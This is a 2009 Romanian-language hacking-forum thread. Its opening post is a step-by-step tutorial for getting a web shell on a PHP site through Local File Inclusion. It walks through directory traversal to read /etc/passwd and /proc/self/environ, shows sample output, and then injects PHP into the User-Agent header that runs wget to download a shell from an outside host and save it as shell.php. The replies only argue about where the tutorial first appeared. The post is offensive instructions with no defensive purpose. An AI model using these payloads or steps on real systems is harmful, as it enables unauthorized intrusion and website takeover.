ZeroCold Posted September 26, 2009 Report Share Posted September 26, 2009 (edited) Shell prin LFI - metoda proc/self/environ 1 - Introducere2 - Descoperire LFI3 - Verificam daca proc/self/environ e accesibil4 - Injectare cod malitios5 - Acces la shell6 - Multumiri>> 1 - IntroducereIn acestu tutorial va voi arata cum sa obtineti un shell pe un site folosindu-va de Local File Inclusion siinjectand cod malitios in proc/self/environ.Este un tutorial care explica totul pas cu pas.>> 2 - Descoperire LFI- Acum sa gasim o un site vulnerabil la Local File Inclusion.Am gasit tinta,sa verificamwww.website.com/view.php?page=contact.php- Acum sa inlocuim contact.php cu ../ si URL-ul va deveniiwww.website.com/view.php?page=../si avem o eroare. Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337sanse mari sa avem o vulnerabilitate de tip Local File Inclusion.Sa trecem mai departe.- Sa verificam daca putem accesa etc/passwd ca sa vedem daca este vulnerabil la Local File Inclusion.Sa face un request : www.website.com/view.php?page=../../../etc/passwdavem o eroare si fisierul etc/passwd nu este inclus.Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337urcam cateva directoriiwww.website.com/view.php?page=../../../../../etc/passwdam inclus cu succes fisierul etc/passwd.root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin>> 3 - Verificam daca proc/self/environ e accesibil- Acum sa vedem daca proc/self/environ este accesibil.O sa inlocuim etc/passwd cu proc/self/environ www.website.com/view.php?page=../../../...lf/environDaca primiti ceva de genul DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80proc/self/environ este accesibil.Daca primiti o pagina alba,o eroare inseamna ca nu este accesibil sau sistemul de operare este FreeBSD.>> 4 - Injectare cod malitios- Acum sa injectam codul nostru malitios in proc/self/environ.Cum putem face asta?Injectam codul in HTTP Header-ul User-Agent.Folositi addon-ul Tamper Data pentru Firefox pentru a schimba User-Agent-ul.Porniti Tamper Data si faceti un request la URL-ul :www.website.com/view.php?page=../../../ ... lf/environAlegeti Tamper si in campul User-Agent scrieti urmatorul cod :<?system('wget hack-bay.com -O shell.php');?>Apoi dati submit la request.Comanda noastra va fi executata(o sa descarce un shell txt de la adresa http://hack-bay.com/Shells/gny.txt]hack-bay.com si il va salva ca shell.php in directorul site-ului) prin intermediul functiei system(),si shell-ul nostru va fi creat.Daca nu merge,incercati exec() pentru ca system() poate fi restrictionat pe server din php.ini>> 5 - Acces la shell- Acuma sa verificam daca codul nostru malitios a fost injectat cu succes.Sa vedem daca shell-ul este prezent.www.website.com/shell.phpShell-ul nostru este acolo.Injectia a fost efectuata cu succes.Sursa: insecurity.ro ; Author: SirGod Edited September 26, 2009 by ZeroCold Quote Link to comment Share on other sites More sharing options...
Guest Praetorian Posted September 26, 2009 Report Share Posted September 26, 2009 Foarte simplu.. ma duc sa imi i-au o paine! Quote Link to comment Share on other sites More sharing options...
Adso Posted September 26, 2009 Report Share Posted September 26, 2009 http://rstcenter.com/forum/16425-shell-prin-lfi-metoda-proc-self-environ.rst Quote Link to comment Share on other sites More sharing options...
dRuNNNk Posted September 26, 2009 Report Share Posted September 26, 2009 l-am mai vazut pe rst oricum e facut de sirgod Quote Link to comment Share on other sites More sharing options...
Adso Posted September 26, 2009 Report Share Posted September 26, 2009 l-am mai vazut pe rst oricum e facut de sirgodreply de 2 lei, nu ai sp nik defapt ai repetat ce am pus eu si sursa lui! Quote Link to comment Share on other sites More sharing options...
dRuNNNk Posted September 26, 2009 Report Share Posted September 26, 2009 scuze nu m-am uitat ca ai scris si tu Quote Link to comment Share on other sites More sharing options...
ZeroCold Posted September 26, 2009 Author Report Share Posted September 26, 2009 http://rstcenter.com/forum/16425-shell-prin-lfi-metoda-proc-self-environ.rstpe ala nu l-am vazut, da oricum se observa mai asta de aici. si...da, e facut de sirgod, am pus las sfarsit autor si sursa Quote Link to comment Share on other sites More sharing options...